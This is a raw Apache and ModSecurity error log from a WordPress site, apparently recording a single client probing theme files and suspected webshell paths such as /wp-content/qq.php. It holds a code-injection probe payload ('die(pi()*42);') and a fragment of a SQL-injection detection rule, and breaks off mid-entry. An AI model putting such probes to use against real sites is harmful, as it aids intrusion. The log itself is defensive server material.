Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/custom-header.php:59 [Tue Aug 09 14:06:41.749504 2022] [:error] [pid 29373:tid 140372701320960] [client 152.89.196.102:49970] Stack trace: [Tue Aug 09 14:06:41.749514 2022] [:error] [pid 29373:tid 140372701320960] [client 152.89.196.102:49970] #0 {main} [Tue Aug 09 14:06:41.749588 2022] [:error] [pid 29373:tid 140372701320960] [client 152.89.196.102:49970] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/custom-header.php on line 59 [Tue Aug 09 14:06:47.847771 2022] [:error] [pid 29975:tid 140372709713664] [client 152.89.196.102:50032] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/custom-header.php:59 [Tue Aug 09 14:06:47.847853 2022] [:error] [pid 29975:tid 140372709713664] [client 152.89.196.102:50032] Stack trace: [Tue Aug 09 14:06:47.847863 2022] [:error] [pid 29975:tid 140372709713664] [client 152.89.196.102:50032] #0 {main} [Tue Aug 09 14:06:47.847967 2022] [:error] [pid 29975:tid 140372709713664] [client 152.89.196.102:50032] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/custom-header.php on line 59 [Tue Aug 09 14:19:14.927653 2022] [:error] [pid 29372:tid 140372692928256] [client 152.89.196.102:50414] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/search.php:13 [Tue Aug 09 14:19:14.927748 2022] [:error] [pid 29372:tid 140372692928256] [client 152.89.196.102:50414] Stack trace: [Tue Aug 09 14:19:14.927762 2022] [:error] [pid 29372:tid 140372692928256] [client 152.89.196.102:50414] #0 {main} [Tue Aug 09 14:19:14.927929 2022] [:error] [pid 29372:tid 140372692928256] [client 152.89.196.102:50414] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/search.php on line 13 [Tue Aug 09 14:19:23.074238 2022] [:error] [pid 29373:tid 140372684535552] [client 152.89.196.102:50416] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/search.php:13 [Tue Aug 09 14:19:23.074331 2022] [:error] [pid 29373:tid 140372684535552] [client 152.89.196.102:50416] Stack trace: [Tue Aug 09 14:19:23.074345 2022] [:error] [pid 29373:tid 140372684535552] [client 152.89.196.102:50416] #0 {main} [Tue Aug 09 14:19:23.074430 2022] [:error] [pid 29373:tid 140372684535552] [client 152.89.196.102:50416] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/search.php on line 13 [Tue Aug 09 14:19:30.586402 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:50424] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/search.php:13 [Tue Aug 09 14:19:30.586503 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:50424] Stack trace: [Tue Aug 09 14:19:30.586518 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:50424] #0 {main} [Tue Aug 09 14:19:30.586617 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:50424] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/search.php on line 13 [Tue Aug 09 14:27:45.533574 2022] [:error] [pid 29975:tid 140372583823104] [client 152.89.196.102:50664] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:q. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:q: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/qq.php"] [unique_id "YvK1McTVOPfEt2gKe1mUxQAAANQ"] [Tue Aug 09 14:27:47.812069 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:50666] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:q. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:q: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/qq.php"] [unique_id "YvK1M8TVOPfEt2gKe1mUxgAAAMY"] [Tue Aug 09 14:27:50.150016 2022] [:error] [pid 29975:tid 140372642572032] [client 152.89.196.102:50668] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:q. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:q: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/qq.php"] [unique_id "YvK1NsTVOPfEt2gKe1mUxwAAAM0"] [Tue Aug 09 14:48:27.006927 2022] [:error] [pid 29372:tid 140372642572032] [client 152.89.196.102:51378] PHP Fatal error: Uncaught Error: Call to undefined function esc_attr() in /home/investig/public_html/wp-content/themes/twentyseventeen/searchform.php:13 [Tue Aug 09 14:48:27.007018 2022] [:error] [pid 29372:tid 140372642572032] [client 152.89.196.102:51378] Stack trace: [Tue Aug 09 14:48:27.007032 2022] [:error] [pid 29372:tid 140372642572032] [client 152.89.196.102:51378] #0 {main} [Tue Aug 09 14:48:27.007128 2022] [:error] [pid 29372:tid 140372642572032] [client 152.89.196.102:51378] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/searchform.php on line 13 [Tue Aug 09 14:48:27.925242 2022] [:error] [pid 29372:tid 140372718106368] [client 152.89.196.102:51380] PHP Fatal error: Uncaught Error: Call to undefined function esc_attr() in /home/investig/public_html/wp-content/themes/twentyseventeen/searchform.php:13 [Tue Aug 09 14:48:27.925302 2022] [:error] [pid 29372:tid 140372718106368] [client 152.89.196.102:51380] Stack trace: [Tue Aug 09 14:48:27.925312 2022] [:error] [pid 29372:tid 140372718106368] [client 152.89.196.102:51380] #0 {main} [Tue Aug 09 14:48:27.925382 2022] [:error] [pid 29372:tid 140372718106368] [client 152.89.196.102:51380] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/searchform.php on line 13 [Tue Aug 09 14:48:28.533081 2022] [:error] [pid 29372:tid 140372701320960] [client 152.89.196.102:51382] PHP Fatal error: Uncaught Error: Call to undefined function esc_attr() in /home/investig/public_html/wp-content/themes/twentyseventeen/searchform.php:13 [Tue Aug 09 14:48:28.533170 2022] [:error] [pid 29372:tid 140372701320960] [client 152.89.196.102:51382] Stack trace: [Tue Aug 09 14:48:28.533185 2022] [:error] [pid 29372:tid 140372701320960] [client 152.89.196.102:51382] #0 {main} [Tue Aug 09 14:48:28.533283 2022] [:error] [pid 29372:tid 140372701320960] [client 152.89.196.102:51382] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/searchform.php on line 13 [Tue Aug 09 15:20:17.057066 2022] [:error] [pid 29372:tid 140372659357440] [client 152.89.196.102:52380] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/index.php:18 [Tue Aug 09 15:20:17.057193 2022] [:error] [pid 29372:tid 140372659357440] [client 152.89.196.102:52380] Stack trace: [Tue Aug 09 15:20:17.057209 2022] [:error] [pid 29372:tid 140372659357440] [client 152.89.196.102:52380] #0 {main} [Tue Aug 09 15:20:17.057308 2022] [:error] [pid 29372:tid 140372659357440] [client 152.89.196.102:52380] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/index.php on line 18 [Tue Aug 09 15:20:17.619956 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:52384] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/index.php:18 [Tue Aug 09 15:20:17.620064 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:52384] Stack trace: [Tue Aug 09 15:20:17.620081 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:52384] #0 {main} [Tue Aug 09 15:20:17.620175 2022] [:error] [pid 29373:tid 140372558644992] [client 152.89.196.102:52384] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/index.php on line 18 [Tue Aug 09 15:20:18.147916 2022] [:error] [pid 29975:tid 140372567037696] [client 152.89.196.102:52386] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/index.php:18 [Tue Aug 09 15:20:18.148009 2022] [:error] [pid 29975:tid 140372567037696] [client 152.89.196.102:52386] Stack trace: [Tue Aug 09 15:20:18.148023 2022] [:error] [pid 29975:tid 140372567037696] [client 152.89.196.102:52386] #0 {main} [Tue Aug 09 15:20:18.148116 2022] [:error] [pid 29975:tid 140372567037696] [client 152.89.196.102:52386] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/index.php on line 18 [Tue Aug 09 15:21:41.421245 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:52524] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/front-page.php:15 [Tue Aug 09 15:21:41.421317 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:52524] Stack trace: [Tue Aug 09 15:21:41.421327 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:52524] #0 {main} [Tue Aug 09 15:21:41.421415 2022] [:error] [pid 29975:tid 140372751677184] [client 152.89.196.102:52524] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/front-page.php on line 15 [Tue Aug 09 15:21:44.846878 2022] [:error] [pid 29975:tid 140372667750144] [client 152.89.196.102:52528] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/front-page.php:15 [Tue Aug 09 15:21:44.846966 2022] [:error] [pid 29975:tid 140372667750144] [client 152.89.196.102:52528] Stack trace: [Tue Aug 09 15:21:44.846980 2022] [:error] [pid 29975:tid 140372667750144] [client 152.89.196.102:52528] #0 {main} [Tue Aug 09 15:21:44.847079 2022] [:error] [pid 29975:tid 140372667750144] [client 152.89.196.102:52528] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/front-page.php on line 15 [Tue Aug 09 15:21:48.435162 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:52534] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/front-page.php:15 [Tue Aug 09 15:21:48.435253 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:52534] Stack trace: [Tue Aug 09 15:21:48.435267 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:52534] #0 {main} [Tue Aug 09 15:21:48.435360 2022] [:error] [pid 29975:tid 140372734891776] [client 152.89.196.102:52534] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/front-page.php on line 15 [Tue Aug 09 15:29:27.075492 2022] [:error] [pid 29373:tid 140372617393920] [client 152.89.196.102:52896] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/ID3/menu_settings.php"] [unique_id "YvLDp4fZxeIP9Uc1qosw1QAAAJA"] [Tue Aug 09 15:29:28.814678 2022] [:error] [pid 29975:tid 140372667750144] [client 152.89.196.102:52898] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/ID3/menu_settings.php"] [unique_id "YvLDqMTVOPfEt2gKe1mVwQAAAMo"] [Tue Aug 09 15:29:30.449526 2022] [:error] [pid 29373:tid 140372550252288] [client 152.89.196.102:52900] [client 152.89.196.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/ID3/menu_settings.php"] [unique_id "YvLDqofZxeIP9Uc1qosw1gAAAJg"] [Tue Aug 09 15:56:17.983927 2022] [autoindex:error] [pid 29975:tid 140372726499072] [client 80.76.51.29:53646] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Aug 09 15:59:57.593662 2022] [:error] [pid 29371:tid 140372743284480] [client 152.89.196.102:53766] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/back-compat.php:26 [Tue Aug 09 15:59:57.593753 2022] [:error] [pid 29371:tid 140372743284480] [client 152.89.196.102:53766] Stack trace: [Tue Aug 09 15:59:57.593774 2022] [:error] [pid 29371:tid 140372743284480] [client 152.89.196.102:53766] #0 {main} [Tue Aug 09 15:59:57.593846 2022] [:error] [pid 29371:tid 140372743284480] [client 152.89.196.102:53766] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/back-compat.php on line 26 [Tue Aug 09 15:59:59.015450 2022] [:error] [pid 29372:tid 140372567037696] [client 152.89.196.102:53768] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/back-compat.php:26 [Tue Aug 09 15:59:59.015554 2022] [:error] [pid 29372:tid 140372567037696] [client 152.89.196.102:53768] Stack trace: [Tue Aug 09 15:59:59.015569 2022] [:error] [pid 29372:tid 140372567037696] [client 152.89.196.102:53768] #0 {main} [Tue Aug 09 15:59:59.015702 2022] [:error] [pid 29372:tid 140372567037696] [client 152.89.196.102:53768] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/back-compat.php on line 26 [Tue Aug 09 16:00:00.126481 2022] [:error] [pid 29371:tid 140372726499072] [client 152.89.196.102:53770] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/back-compat.php:26 [Tue Aug 09 16:00:00.126571 2022] [:error] [pid 29371:tid 140372726499072] [client 152.89.196.102:53770] Stack trace: [Tue Aug 09 16:00:00.126582 2022] [:error] [pid 29371:tid 140372726499072] [client 152.89.196.102:53770] #0 {main} [Tue Aug 09 16:00:00.126684 2022] [:error] [pid 29371:tid 140372726499072] [client 152.89.196.102:53770] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/back-compat.php on line 26 [Tue Aug 09 16:00:21.337229 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:53778] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php:17 [Tue Aug 09 16:00:21.337325 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:53778] Stack trace: [Tue Aug 09 16:00:21.337339 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:53778] #0 {main} [Tue Aug 09 16:00:21.337458 2022] [:error] [pid 29975:tid 140372684535552] [client 152.89.196.102:53778] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php on line 17 [Tue Aug 09 16:00:21.746696 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:53780] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php:17 [Tue Aug 09 16:00:21.746791 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:53780] Stack trace: [Tue Aug 09 16:00:21.746807 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:53780] #0 {main} [Tue Aug 09 16:00:21.746946 2022] [:error] [pid 29371:tid 140372692928256] [client 152.89.196.102:53780] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php on line 17 [Tue Aug 09 16:00:22.535266 2022] [:error] [pid 29975:tid 140372567037696] [client 152.89.196.102:53782] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php:17 [Tue Aug 09 16:00:22.535372 2022] [:error] [pid 29975:tid 140372567037696] [client 152.89.196.102:53782] Stack trace: [Tue Aug 09 16:00:22.535387 2022] [:error] [pid 29975:tid 140372567037696] [client 152.89.196.102:53782] #0 {main} [Tue Aug 09 16:00:22.535511 2022] [:error] [pid 29975:tid 140372567037696] [client 152.89.196.102:53782] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php on line 17 [Tue Aug 09 16:12:03.407825 2022] [:error] [pid 29373:tid 140372609001216] [client 152.89.196.102:54226] PHP Fatal error: Uncaught Error: Call to undefined function add_filter() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-functions.php:67 [Tue Aug 09 16:12:03.407916 2022] [:error] [pid 29373:tid 140372609001216] [client 152.89.196.102:54226] Stack trace: [Tue Aug 09 16:12:03.408064 2022] [:error] [pid 29373:tid 140372609001216] [client 152.89.196.102:54226] #0 {main} [Tue Aug 09 16:12:03.408185 2022] [:error] [pid 29373:tid 140372609001216] [client 152.89.196.102:54226] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-functions.php on line 67 [Tue Aug 09 16:12:04.461328 2022] [:error] [pid 29373:tid 140372617393920] [client 152.89.196.102:54228] PHP Fatal error: Uncaught Error: Call to undefined function add_filter() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-functions.php:67 [Tue Aug 09 16:12:04.461434 2022] [:error] [pid 29373:tid 140372617393920] [client 152.89.196.102:54228] Stack trace: [Tue Aug 09 16:12:04.461448 2022] [:error] [pid 29373:tid 140372617393920] [client 152.89.196.102:54228] #0 {main} [Tue Aug 09 16:12:04.461562 2022] [:error] [pid 29373:tid 140372617393920] [client 152.89.196.102:54228] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-functions.php on line 67 [Tue Aug 09 16:12:05.359054 2022] [:error] [pid 29373:tid 140372550252288] [client 152.89.196.102:54230] PHP Fatal error: Uncaught Error: Call to undefined function add_filter() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-functions.php:67 [Tue Aug 09 16:12:05.359138 2022] [:error] [pid 29373:tid 140372550252288] [client 152.89.196.102:54230] Stack trace: [Tue Aug 09 16:12:05.359149 2022] [:error] [pid 29373:tid 140372550252288] [client 152.89.196.102:54230] #0 {main} [Tue Aug 09 16:12:05.359228 2022] [:error] [pid 29373:tid 140372550252288] [client 152.89.196.102:54230] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-functions.php on line 67 [Tue Aug 09 16:40:36.277056 2022] [:error] [pid 29975:tid 140372558644992] [client 152.89.196.102:55122] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-page.php:15 [Tue Aug 09 16:40:36.277148 2022] [:error] [pid 29975:tid 140372558644992] [client 152.89.196.102:55122] Stack trace: [Tue Aug 09 16:40:36.277158 2022] [:error] [pid 29975:tid 140372558644992] [client 152.89.196.102:55122] #0 {main} [Tue Aug 09 16:40:36.277265 2022] [:error] [pid 29975:tid 140372558644992] [client 152.89.196.102:55122] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-page.php on line 15 [Tue Aug 09 16:40:37.755577 2022] [:error] [pid 29975:tid 140372617393920] [client 152.89.196.102:55124] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-page.php:15 [Tue Aug 09 16:40:37.755713 2022] [:error] [pid 29975:tid 140372617393920] [client 152.89.196.102:55124] Stack trace: [Tue Aug 09 16:40:37.755733 2022] [:error] [pid 29975:tid 140372617393920] [client 152.89.196.102:55124] #0 {main} [Tue Aug 09 16:40:37.755856 2022] [:error] [pid 29975:tid 140372617393920] [client 152.89.196.102:55124] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-page.php on line 15 [Tue Aug 09 16:40:38.890445 2022] [:error] [pid 29975:tid 140372726499072] [client 152.89.196.102:55130] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-page.php:15 [Tue Aug 09 16:40:38.890511 2022] [:error] [pid 29975:tid 140372726499072] [client 152.89.196.102:55130] Stack trace: [Tue Aug 09 16:40:38.890521 2022] [:error] [pid 29975:tid 140372726499072] [client 152.89.196.102:55130] #0 {main} [Tue Aug 09 16:40:38.890617 2022] [:error] [pid 29975:tid 140372726499072] [client 152.89.196.102:55130] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-page.php on line 15 [Tue Aug 09 16:40:57.670214 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:55138] PHP Fatal error: Uncaught Error: Call to undefined function is_active_sidebar() in /home/investig/public_html/wp-content/themes/twentyseventeen/sidebar.php:13 [Tue Aug 09 16:40:57.670294 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:55138] Stack trace: [Tue Aug 09 16:40:57.670308 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:55138] #0 {main} [Tue Aug 09 16:40:57.670381 2022] [:error] [pid 29975:tid 140372692928256] [client 152.89.196.102:55138] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/sidebar.php on line 13 [Tue Aug 09 16:40:58.902868 2022] [:error] [pid 29975:tid 140372583823104] [client 152.89.196.102:55140] PHP Fatal error: Uncaught Error: Call to undefined function is_active_sidebar() in /home/investig/public_html/wp-content/themes/twentyseventeen/sidebar.php:13 [Tue Aug 09 16:40:58.902937 2022] [:error] [pid 29975:tid 140372583823104] [client 152.89.196.102:55140] Stack trace: [Tue Aug 09 16:40:58.902948 2022] [:error] [pid 29975:tid 140372583823104] [client 152.89.196.102:55140] #0 {main} [Tue Aug 09 16:40:58.903037 2022] [:error] [pid 29975:tid 140372583823104] [client 152.89.196.102:55140] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/sidebar.php on line 13 [Tue Aug 09 16:40:59.721039 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:55142] PHP Fatal error: Uncaught Error: Call to undefined function is_active_sidebar() in /home/investig/public_html/wp-content/themes/twentyseventeen/sidebar.php:13 [Tue Aug 09 16:40:59.721129 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:55142] Stack trace: [Tue Aug 09 16:40:59.721144 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:55142] #0 {main} [Tue Aug 09 16:40:59.721240 2022] [:error] [pid 29975:tid 140372701320960] [client 152.89.196.102:55142] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/sidebar.php on line 13 [Tue Aug 09 16:51:55.571563 2022] [:error] [pid 29371:tid 140372558644992] [client 152.89.196.102:55624] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php:15 [Tue Aug 09 16:51:55.571817 2022] [:error] [pid 29371:tid 140372558644992] [client 152.89.196.102:55624] Stack trace: [Tue Aug 09 16:51:55.571833 2022] [:error] [pid 29371:tid 140372558644992] [client 152.89.196.102:55624] #0 {main} [Tue Aug 09 16:51:55.571945 2022] [:error] [pid 29371:tid 140372558644992] [client 152.89.196.102:55624] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php on line 15 [Tue Aug 09 16:51:58.599946 2022] [:error] [pid 29371:tid 140372592215808] [client 152.89.196.102:55626] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php:15 [Tue Aug 09 16:51:58.600044 2022] [:error] [pid 29371:tid 140372592215808] [client 152.89.196.102:55626] Stack trace: [Tue Aug 09 16:51:58.600059 2022] [:error] [pid 29371:tid 140372592215808] [client 152.89.196.102:55626] #0 {main} [Tue Aug 09 16:51:58.600180 2022] [:error] [pid 29371:tid 140372592215808] [client 152.89.196.102:55626] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php on line 15 [Tue Aug 09 16:52:01.439720 2022] [:error] [pid 29371:tid 140372718106368] [client 152.89.196.102:55636] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php:15 [Tue Aug 09 16:52:01.439797 2022] [:error] [pid 29371:tid 140372718106368] [client 152.89.196.102:55636] Stack trace: [Tue Aug 